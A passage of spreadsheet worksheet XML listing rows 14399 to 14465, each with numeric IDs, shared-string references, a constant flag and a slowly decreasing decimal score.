      <c r="A14399" s="1">
        <v>19117.0</v>
      </c>
      <c r="B14399" s="2">
        <v>5.4752633E7</v>
      </c>
      <c r="C14399" s="2" t="s">
        <v>13874</v>
      </c>
      <c r="D14399" s="2">
        <v>1.0</v>
      </c>
      <c r="E14399" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14399" s="2">
        <v>0.1293650793650794</v>
      </c>
    </row>
    <row r="14400" ht="15.75" customHeight="1">
      <c r="A14400" s="1">
        <v>7753.0</v>
      </c>
      <c r="B14400" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C14400" s="2" t="s">
        <v>13875</v>
      </c>
      <c r="D14400" s="2">
        <v>1.0</v>
      </c>
      <c r="E14400" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14400" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="14401" ht="15.75" customHeight="1">
      <c r="A14401" s="1">
        <v>27390.0</v>
      </c>
      <c r="B14401" s="2">
        <v>2.1776903E7</v>
      </c>
      <c r="C14401" s="2" t="s">
        <v>13876</v>
      </c>
      <c r="D14401" s="2">
        <v>1.0</v>
      </c>
      <c r="E14401" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14401" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="14402" ht="15.75" customHeight="1">
      <c r="A14402" s="1">
        <v>9416.0</v>
      </c>
      <c r="B14402" s="2">
        <v>5.5785068E7</v>
      </c>
      <c r="C14402" s="2" t="s">
        <v>13877</v>
      </c>
      <c r="D14402" s="2">
        <v>1.0</v>
      </c>
      <c r="E14402" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14402" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="14403" ht="15.75" customHeight="1">
      <c r="A14403" s="1">
        <v>13439.0</v>
      </c>
      <c r="B14403" s="2">
        <v>3.5118338E7</v>
      </c>
      <c r="C14403" s="2" t="s">
        <v>13878</v>
      </c>
      <c r="D14403" s="2">
        <v>1.0</v>
      </c>
      <c r="E14403" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14403" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="14404" ht="15.75" customHeight="1">
      <c r="A14404" s="1">
        <v>14191.0</v>
      </c>
      <c r="B14404" s="2">
        <v>3.8171487E7</v>
      </c>
      <c r="C14404" s="2" t="s">
        <v>13879</v>
      </c>
      <c r="D14404" s="2">
        <v>1.0</v>
      </c>
      <c r="E14404" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14404" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="14405" ht="15.75" customHeight="1">
      <c r="A14405" s="1">
        <v>31450.0</v>
      </c>
      <c r="B14405" s="2">
        <v>5.0321877E7</v>
      </c>
      <c r="C14405" s="2" t="s">
        <v>13880</v>
      </c>
      <c r="D14405" s="2">
        <v>1.0</v>
      </c>
      <c r="E14405" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14405" s="2">
        <v>0.1291079812206573</v>
      </c>
    </row>
    <row r="14406" ht="15.75" customHeight="1">
      <c r="A14406" s="1">
        <v>11259.0</v>
      </c>
      <c r="B14406" s="2">
        <v>2.0636579E7</v>
      </c>
      <c r="C14406" s="2" t="s">
        <v>13881</v>
      </c>
      <c r="D14406" s="2">
        <v>1.0</v>
      </c>
      <c r="E14406" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14406" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="14407" ht="15.75" customHeight="1">
      <c r="A14407" s="1">
        <v>17963.0</v>
      </c>
      <c r="B14407" s="2">
        <v>5.131941E7</v>
      </c>
      <c r="C14407" s="2" t="s">
        <v>13882</v>
      </c>
      <c r="D14407" s="2">
        <v>1.0</v>
      </c>
      <c r="E14407" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14407" s="2">
        <v>0.1289308176100629</v>
      </c>
    </row>
    <row r="14408" ht="15.75" customHeight="1">
      <c r="A14408" s="1">
        <v>31972.0</v>
      </c>
      <c r="B14408" s="2">
        <v>5316476.0</v>
      </c>
      <c r="C14408" s="2" t="s">
        <v>13883</v>
      </c>
      <c r="D14408" s="2">
        <v>1.0</v>
      </c>
      <c r="E14408" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14408" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="14409" ht="15.75" customHeight="1">
      <c r="A14409" s="1">
        <v>7777.0</v>
      </c>
      <c r="B14409" s="2">
        <v>5.2172131E7</v>
      </c>
      <c r="C14409" s="2" t="s">
        <v>13884</v>
      </c>
      <c r="D14409" s="2">
        <v>1.0</v>
      </c>
      <c r="E14409" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14409" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="14410" ht="15.75" customHeight="1">
      <c r="A14410" s="1">
        <v>16436.0</v>
      </c>
      <c r="B14410" s="2">
        <v>4.634839E7</v>
      </c>
      <c r="C14410" s="2" t="s">
        <v>13885</v>
      </c>
      <c r="D14410" s="2">
        <v>1.0</v>
      </c>
      <c r="E14410" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14410" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="14411" ht="15.75" customHeight="1">
      <c r="A14411" s="1">
        <v>28072.0</v>
      </c>
      <c r="B14411" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C14411" s="2" t="s">
        <v>13886</v>
      </c>
      <c r="D14411" s="2">
        <v>1.0</v>
      </c>
      <c r="E14411" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14411" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="14412" ht="15.75" customHeight="1">
      <c r="A14412" s="1">
        <v>50.0</v>
      </c>
      <c r="B14412" s="2">
        <v>1.0903235E7</v>
      </c>
      <c r="C14412" s="2" t="s">
        <v>13887</v>
      </c>
      <c r="D14412" s="2">
        <v>1.0</v>
      </c>
      <c r="E14412" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14412" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="14413" ht="15.75" customHeight="1">
      <c r="A14413" s="1">
        <v>7952.0</v>
      </c>
      <c r="B14413" s="2">
        <v>5.2649796E7</v>
      </c>
      <c r="C14413" s="2" t="s">
        <v>13888</v>
      </c>
      <c r="D14413" s="2">
        <v>1.0</v>
      </c>
      <c r="E14413" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14413" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="14414" ht="15.75" customHeight="1">
      <c r="A14414" s="1">
        <v>10310.0</v>
      </c>
      <c r="B14414" s="2">
        <v>5.7671533E7</v>
      </c>
      <c r="C14414" s="2" t="s">
        <v>13889</v>
      </c>
      <c r="D14414" s="2">
        <v>1.0</v>
      </c>
      <c r="E14414" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14414" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="14415" ht="15.75" customHeight="1">
      <c r="A14415" s="1">
        <v>11799.0</v>
      </c>
      <c r="B14415" s="2">
        <v>2.4377958E7</v>
      </c>
      <c r="C14415" s="2" t="s">
        <v>13890</v>
      </c>
      <c r="D14415" s="2">
        <v>1.0</v>
      </c>
      <c r="E14415" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14415" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="14416" ht="15.75" customHeight="1">
      <c r="A14416" s="1">
        <v>28476.0</v>
      </c>
      <c r="B14416" s="2">
        <v>2.6620789E7</v>
      </c>
      <c r="C14416" s="2" t="s">
        <v>13891</v>
      </c>
      <c r="D14416" s="2">
        <v>1.0</v>
      </c>
      <c r="E14416" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14416" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="14417" ht="15.75" customHeight="1">
      <c r="A14417" s="1">
        <v>25863.0</v>
      </c>
      <c r="B14417" s="2">
        <v>1.4891321E7</v>
      </c>
      <c r="C14417" s="2" t="s">
        <v>13892</v>
      </c>
      <c r="D14417" s="2">
        <v>1.0</v>
      </c>
      <c r="E14417" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14417" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="14418" ht="15.75" customHeight="1">
      <c r="A14418" s="1">
        <v>31626.0</v>
      </c>
      <c r="B14418" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C14418" s="2" t="s">
        <v>13893</v>
      </c>
      <c r="D14418" s="2">
        <v>1.0</v>
      </c>
      <c r="E14418" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14418" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="14419" ht="15.75" customHeight="1">
      <c r="A14419" s="1">
        <v>1366.0</v>
      </c>
      <c r="B14419" s="2">
        <v>2.6012138E7</v>
      </c>
      <c r="C14419" s="2" t="s">
        <v>13894</v>
      </c>
      <c r="D14419" s="2">
        <v>1.0</v>
      </c>
      <c r="E14419" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14419" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="14420" ht="15.75" customHeight="1">
      <c r="A14420" s="1">
        <v>4645.0</v>
      </c>
      <c r="B14420" s="2">
        <v>4.3064819E7</v>
      </c>
      <c r="C14420" s="2" t="s">
        <v>13895</v>
      </c>
      <c r="D14420" s="2">
        <v>1.0</v>
      </c>
      <c r="E14420" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14420" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="14421" ht="15.75" customHeight="1">
      <c r="A14421" s="1">
        <v>9814.0</v>
      </c>
      <c r="B14421" s="2">
        <v>5.6611893E7</v>
      </c>
      <c r="C14421" s="2" t="s">
        <v>13896</v>
      </c>
      <c r="D14421" s="2">
        <v>1.0</v>
      </c>
      <c r="E14421" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14421" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="14422" ht="15.75" customHeight="1">
      <c r="A14422" s="1">
        <v>14173.0</v>
      </c>
      <c r="B14422" s="2">
        <v>3.8067388E7</v>
      </c>
      <c r="C14422" s="2" t="s">
        <v>13897</v>
      </c>
      <c r="D14422" s="2">
        <v>1.0</v>
      </c>
      <c r="E14422" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14422" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="14423" ht="15.75" customHeight="1">
      <c r="A14423" s="1">
        <v>16823.0</v>
      </c>
      <c r="B14423" s="2">
        <v>4.7868611E7</v>
      </c>
      <c r="C14423" s="2" t="s">
        <v>13898</v>
      </c>
      <c r="D14423" s="2">
        <v>1.0</v>
      </c>
      <c r="E14423" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14423" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="14424" ht="15.75" customHeight="1">
      <c r="A14424" s="1">
        <v>18538.0</v>
      </c>
      <c r="B14424" s="2">
        <v>5.3112106E7</v>
      </c>
      <c r="C14424" s="2" t="s">
        <v>13899</v>
      </c>
      <c r="D14424" s="2">
        <v>1.0</v>
      </c>
      <c r="E14424" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14424" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="14425" ht="15.75" customHeight="1">
      <c r="A14425" s="1">
        <v>12067.0</v>
      </c>
      <c r="B14425" s="2">
        <v>2.6606303E7</v>
      </c>
      <c r="C14425" s="2" t="s">
        <v>13900</v>
      </c>
      <c r="D14425" s="2">
        <v>1.0</v>
      </c>
      <c r="E14425" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14425" s="2">
        <v>0.1282679738562092</v>
      </c>
    </row>
    <row r="14426" ht="15.75" customHeight="1">
      <c r="A14426" s="1">
        <v>31595.0</v>
      </c>
      <c r="B14426" s="2">
        <v>5130837.0</v>
      </c>
      <c r="C14426" s="2" t="s">
        <v>13901</v>
      </c>
      <c r="D14426" s="2">
        <v>1.0</v>
      </c>
      <c r="E14426" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14426" s="2">
        <v>0.1282679738562092</v>
      </c>
    </row>
    <row r="14427" ht="15.75" customHeight="1">
      <c r="A14427" s="1">
        <v>9371.0</v>
      </c>
      <c r="B14427" s="2">
        <v>5.5692625E7</v>
      </c>
      <c r="C14427" s="2" t="s">
        <v>13902</v>
      </c>
      <c r="D14427" s="2">
        <v>1.0</v>
      </c>
      <c r="E14427" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14427" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="14428" ht="15.75" customHeight="1">
      <c r="A14428" s="1">
        <v>32943.0</v>
      </c>
      <c r="B14428" s="2">
        <v>6472329.0</v>
      </c>
      <c r="C14428" s="2" t="s">
        <v>13903</v>
      </c>
      <c r="D14428" s="2">
        <v>1.0</v>
      </c>
      <c r="E14428" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14428" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="14429" ht="15.75" customHeight="1">
      <c r="A14429" s="1">
        <v>414.0</v>
      </c>
      <c r="B14429" s="2">
        <v>1.6753741E7</v>
      </c>
      <c r="C14429" s="2" t="s">
        <v>13904</v>
      </c>
      <c r="D14429" s="2">
        <v>1.0</v>
      </c>
      <c r="E14429" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14429" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14430" ht="15.75" customHeight="1">
      <c r="A14430" s="1">
        <v>2679.0</v>
      </c>
      <c r="B14430" s="2">
        <v>3.4798882E7</v>
      </c>
      <c r="C14430" s="2" t="s">
        <v>13905</v>
      </c>
      <c r="D14430" s="2">
        <v>1.0</v>
      </c>
      <c r="E14430" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14430" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14431" ht="15.75" customHeight="1">
      <c r="A14431" s="1">
        <v>4196.0</v>
      </c>
      <c r="B14431" s="2">
        <v>4.161132E7</v>
      </c>
      <c r="C14431" s="2" t="s">
        <v>13906</v>
      </c>
      <c r="D14431" s="2">
        <v>1.0</v>
      </c>
      <c r="E14431" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14431" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14432" ht="15.75" customHeight="1">
      <c r="A14432" s="1">
        <v>7162.0</v>
      </c>
      <c r="B14432" s="2">
        <v>5.049533E7</v>
      </c>
      <c r="C14432" s="2" t="s">
        <v>13907</v>
      </c>
      <c r="D14432" s="2">
        <v>1.0</v>
      </c>
      <c r="E14432" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14432" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14433" ht="15.75" customHeight="1">
      <c r="A14433" s="1">
        <v>7475.0</v>
      </c>
      <c r="B14433" s="2">
        <v>5.1302313E7</v>
      </c>
      <c r="C14433" s="2" t="s">
        <v>13908</v>
      </c>
      <c r="D14433" s="2">
        <v>1.0</v>
      </c>
      <c r="E14433" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14433" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14434" ht="15.75" customHeight="1">
      <c r="A14434" s="1">
        <v>10098.0</v>
      </c>
      <c r="B14434" s="2">
        <v>5.7205139E7</v>
      </c>
      <c r="C14434" s="2" t="s">
        <v>13909</v>
      </c>
      <c r="D14434" s="2">
        <v>1.0</v>
      </c>
      <c r="E14434" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14434" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14435" ht="15.75" customHeight="1">
      <c r="A14435" s="1">
        <v>11648.0</v>
      </c>
      <c r="B14435" s="2">
        <v>2.3243687E7</v>
      </c>
      <c r="C14435" s="2" t="s">
        <v>13910</v>
      </c>
      <c r="D14435" s="2">
        <v>1.0</v>
      </c>
      <c r="E14435" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14435" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14436" ht="15.75" customHeight="1">
      <c r="A14436" s="1">
        <v>13132.0</v>
      </c>
      <c r="B14436" s="2">
        <v>3.3687819E7</v>
      </c>
      <c r="C14436" s="2" t="s">
        <v>13911</v>
      </c>
      <c r="D14436" s="2">
        <v>1.0</v>
      </c>
      <c r="E14436" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14436" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14437" ht="15.75" customHeight="1">
      <c r="A14437" s="1">
        <v>14126.0</v>
      </c>
      <c r="B14437" s="2">
        <v>3.7872399E7</v>
      </c>
      <c r="C14437" s="2" t="s">
        <v>13912</v>
      </c>
      <c r="D14437" s="2">
        <v>1.0</v>
      </c>
      <c r="E14437" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14437" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14438" ht="15.75" customHeight="1">
      <c r="A14438" s="1">
        <v>16228.0</v>
      </c>
      <c r="B14438" s="2">
        <v>4.5728461E7</v>
      </c>
      <c r="C14438" s="2" t="s">
        <v>13913</v>
      </c>
      <c r="D14438" s="2">
        <v>1.0</v>
      </c>
      <c r="E14438" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14438" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14439" ht="15.75" customHeight="1">
      <c r="A14439" s="1">
        <v>16517.0</v>
      </c>
      <c r="B14439" s="2">
        <v>4.663584E7</v>
      </c>
      <c r="C14439" s="2" t="s">
        <v>13914</v>
      </c>
      <c r="D14439" s="2">
        <v>1.0</v>
      </c>
      <c r="E14439" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14439" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14440" ht="15.75" customHeight="1">
      <c r="A14440" s="1">
        <v>20168.0</v>
      </c>
      <c r="B14440" s="2">
        <v>1.0406897E7</v>
      </c>
      <c r="C14440" s="2" t="s">
        <v>13915</v>
      </c>
      <c r="D14440" s="2">
        <v>1.0</v>
      </c>
      <c r="E14440" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14440" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14441" ht="15.75" customHeight="1">
      <c r="A14441" s="1">
        <v>23309.0</v>
      </c>
      <c r="B14441" s="2">
        <v>5.413153E7</v>
      </c>
      <c r="C14441" s="2" t="s">
        <v>13916</v>
      </c>
      <c r="D14441" s="2">
        <v>1.0</v>
      </c>
      <c r="E14441" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14441" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14442" ht="15.75" customHeight="1">
      <c r="A14442" s="1">
        <v>30385.0</v>
      </c>
      <c r="B14442" s="2">
        <v>3.8537922E7</v>
      </c>
      <c r="C14442" s="2" t="s">
        <v>13917</v>
      </c>
      <c r="D14442" s="2">
        <v>1.0</v>
      </c>
      <c r="E14442" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14442" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14443" ht="15.75" customHeight="1">
      <c r="A14443" s="1">
        <v>32135.0</v>
      </c>
      <c r="B14443" s="2">
        <v>5.4131529E7</v>
      </c>
      <c r="C14443" s="2" t="s">
        <v>13916</v>
      </c>
      <c r="D14443" s="2">
        <v>1.0</v>
      </c>
      <c r="E14443" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14443" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="14444" ht="15.75" customHeight="1">
      <c r="A14444" s="1">
        <v>4437.0</v>
      </c>
      <c r="B14444" s="2">
        <v>4.2351597E7</v>
      </c>
      <c r="C14444" s="2" t="s">
        <v>13918</v>
      </c>
      <c r="D14444" s="2">
        <v>1.0</v>
      </c>
      <c r="E14444" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14444" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="14445" ht="15.75" customHeight="1">
      <c r="A14445" s="1">
        <v>14775.0</v>
      </c>
      <c r="B14445" s="2">
        <v>4.0871083E7</v>
      </c>
      <c r="C14445" s="2" t="s">
        <v>13919</v>
      </c>
      <c r="D14445" s="2">
        <v>1.0</v>
      </c>
      <c r="E14445" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14445" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="14446" ht="15.75" customHeight="1">
      <c r="A14446" s="1">
        <v>19011.0</v>
      </c>
      <c r="B14446" s="2">
        <v>5.4507069E7</v>
      </c>
      <c r="C14446" s="2" t="s">
        <v>13920</v>
      </c>
      <c r="D14446" s="2">
        <v>1.0</v>
      </c>
      <c r="E14446" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14446" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="14447" ht="15.75" customHeight="1">
      <c r="A14447" s="1">
        <v>29171.0</v>
      </c>
      <c r="B14447" s="2">
        <v>3.0698749E7</v>
      </c>
      <c r="C14447" s="2" t="s">
        <v>13921</v>
      </c>
      <c r="D14447" s="2">
        <v>1.0</v>
      </c>
      <c r="E14447" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14447" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="14448" ht="15.75" customHeight="1">
      <c r="A14448" s="1">
        <v>1799.0</v>
      </c>
      <c r="B14448" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C14448" s="2" t="s">
        <v>13922</v>
      </c>
      <c r="D14448" s="2">
        <v>1.0</v>
      </c>
      <c r="E14448" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14448" s="2">
        <v>0.1276803118908383</v>
      </c>
    </row>
    <row r="14449" ht="15.75" customHeight="1">
      <c r="A14449" s="1">
        <v>34167.0</v>
      </c>
      <c r="B14449" s="2">
        <v>9923979.0</v>
      </c>
      <c r="C14449" s="2" t="s">
        <v>13923</v>
      </c>
      <c r="D14449" s="2">
        <v>1.0</v>
      </c>
      <c r="E14449" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14449" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="14450" ht="15.75" customHeight="1">
      <c r="A14450" s="1">
        <v>4753.0</v>
      </c>
      <c r="B14450" s="2">
        <v>4.3394701E7</v>
      </c>
      <c r="C14450" s="2" t="s">
        <v>13924</v>
      </c>
      <c r="D14450" s="2">
        <v>1.0</v>
      </c>
      <c r="E14450" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14450" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="14451" ht="15.75" customHeight="1">
      <c r="A14451" s="1">
        <v>19087.0</v>
      </c>
      <c r="B14451" s="2">
        <v>5.4657252E7</v>
      </c>
      <c r="C14451" s="2" t="s">
        <v>13925</v>
      </c>
      <c r="D14451" s="2">
        <v>1.0</v>
      </c>
      <c r="E14451" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14451" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="14452" ht="15.75" customHeight="1">
      <c r="A14452" s="1">
        <v>13184.0</v>
      </c>
      <c r="B14452" s="2">
        <v>3.4052642E7</v>
      </c>
      <c r="C14452" s="2" t="s">
        <v>13926</v>
      </c>
      <c r="D14452" s="2">
        <v>1.0</v>
      </c>
      <c r="E14452" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14452" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="14453" ht="15.75" customHeight="1">
      <c r="A14453" s="1">
        <v>32879.0</v>
      </c>
      <c r="B14453" s="2">
        <v>6341236.0</v>
      </c>
      <c r="C14453" s="2" t="s">
        <v>13927</v>
      </c>
      <c r="D14453" s="2">
        <v>1.0</v>
      </c>
      <c r="E14453" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14453" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="14454" ht="15.75" customHeight="1">
      <c r="A14454" s="1">
        <v>5062.0</v>
      </c>
      <c r="B14454" s="2">
        <v>4.4365468E7</v>
      </c>
      <c r="C14454" s="2" t="s">
        <v>13928</v>
      </c>
      <c r="D14454" s="2">
        <v>1.0</v>
      </c>
      <c r="E14454" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14454" s="2">
        <v>0.1273946360153256</v>
      </c>
    </row>
    <row r="14455" ht="15.75" customHeight="1">
      <c r="A14455" s="1">
        <v>5225.0</v>
      </c>
      <c r="B14455" s="2">
        <v>4.4969924E7</v>
      </c>
      <c r="C14455" s="2" t="s">
        <v>13929</v>
      </c>
      <c r="D14455" s="2">
        <v>1.0</v>
      </c>
      <c r="E14455" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14455" s="2">
        <v>0.1273946360153256</v>
      </c>
    </row>
    <row r="14456" ht="15.75" customHeight="1">
      <c r="A14456" s="1">
        <v>9813.0</v>
      </c>
      <c r="B14456" s="2">
        <v>5.6611893E7</v>
      </c>
      <c r="C14456" s="2" t="s">
        <v>13930</v>
      </c>
      <c r="D14456" s="2">
        <v>1.0</v>
      </c>
      <c r="E14456" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14456" s="2">
        <v>0.1273946360153256</v>
      </c>
    </row>
    <row r="14457" ht="15.75" customHeight="1">
      <c r="A14457" s="1">
        <v>17290.0</v>
      </c>
      <c r="B14457" s="2">
        <v>4.922133E7</v>
      </c>
      <c r="C14457" s="2" t="s">
        <v>13931</v>
      </c>
      <c r="D14457" s="2">
        <v>1.0</v>
      </c>
      <c r="E14457" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14457" s="2">
        <v>0.1273946360153256</v>
      </c>
    </row>
    <row r="14458" ht="15.75" customHeight="1">
      <c r="A14458" s="1">
        <v>8166.0</v>
      </c>
      <c r="B14458" s="2">
        <v>5.3213626E7</v>
      </c>
      <c r="C14458" s="2" t="s">
        <v>13932</v>
      </c>
      <c r="D14458" s="2">
        <v>1.0</v>
      </c>
      <c r="E14458" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14458" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="14459" ht="15.75" customHeight="1">
      <c r="A14459" s="1">
        <v>9824.0</v>
      </c>
      <c r="B14459" s="2">
        <v>5.6626803E7</v>
      </c>
      <c r="C14459" s="2" t="s">
        <v>13933</v>
      </c>
      <c r="D14459" s="2">
        <v>1.0</v>
      </c>
      <c r="E14459" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14459" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="14460" ht="15.75" customHeight="1">
      <c r="A14460" s="1">
        <v>8610.0</v>
      </c>
      <c r="B14460" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C14460" s="2" t="s">
        <v>13934</v>
      </c>
      <c r="D14460" s="2">
        <v>1.0</v>
      </c>
      <c r="E14460" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14460" s="2">
        <v>0.1271043771043772</v>
      </c>
    </row>
    <row r="14461" ht="15.75" customHeight="1">
      <c r="A14461" s="1">
        <v>29378.0</v>
      </c>
      <c r="B14461" s="2">
        <v>3.1779813E7</v>
      </c>
      <c r="C14461" s="2" t="s">
        <v>13935</v>
      </c>
      <c r="D14461" s="2">
        <v>1.0</v>
      </c>
      <c r="E14461" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14461" s="2">
        <v>0.1268939393939394</v>
      </c>
    </row>
    <row r="14462" ht="15.75" customHeight="1">
      <c r="A14462" s="1">
        <v>18971.0</v>
      </c>
      <c r="B14462" s="2">
        <v>5.4374837E7</v>
      </c>
      <c r="C14462" s="2" t="s">
        <v>13936</v>
      </c>
      <c r="D14462" s="2">
        <v>1.0</v>
      </c>
      <c r="E14462" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14462" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="14463" ht="15.75" customHeight="1">
      <c r="A14463" s="1">
        <v>21803.0</v>
      </c>
      <c r="B14463" s="2">
        <v>2.6737606E7</v>
      </c>
      <c r="C14463" s="2" t="s">
        <v>13937</v>
      </c>
      <c r="D14463" s="2">
        <v>1.0</v>
      </c>
      <c r="E14463" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14463" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="14464" ht="15.75" customHeight="1">
      <c r="A14464" s="1">
        <v>30168.0</v>
      </c>
      <c r="B14464" s="2">
        <v>3.7099916E7</v>
      </c>
      <c r="C14464" s="2" t="s">
        <v>13938</v>
      </c>
      <c r="D14464" s="2">
        <v>1.0</v>
      </c>
      <c r="E14464" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14464" s="2">
        <v>0.1268518518518518</v>
      </c>
    </row>
    <row r="14465" ht="15.75" customHeight="1">
      <c r="A14465" s="1">
        <v>13060.0</v>
      </c>
      <c r="B14465" s="2">
        <v>3.3249202E7</v>
      </c>
      <c r="C14465" s="2" t="s">
        <v>13939</v>
      </c>
      <c r="D14465" s="2">
        <v>1.0</v>
      </c>
      <c r="E14465" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14465" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="14466" ht="15.75" customHeight="1">
      <c r="A14466" s="1">
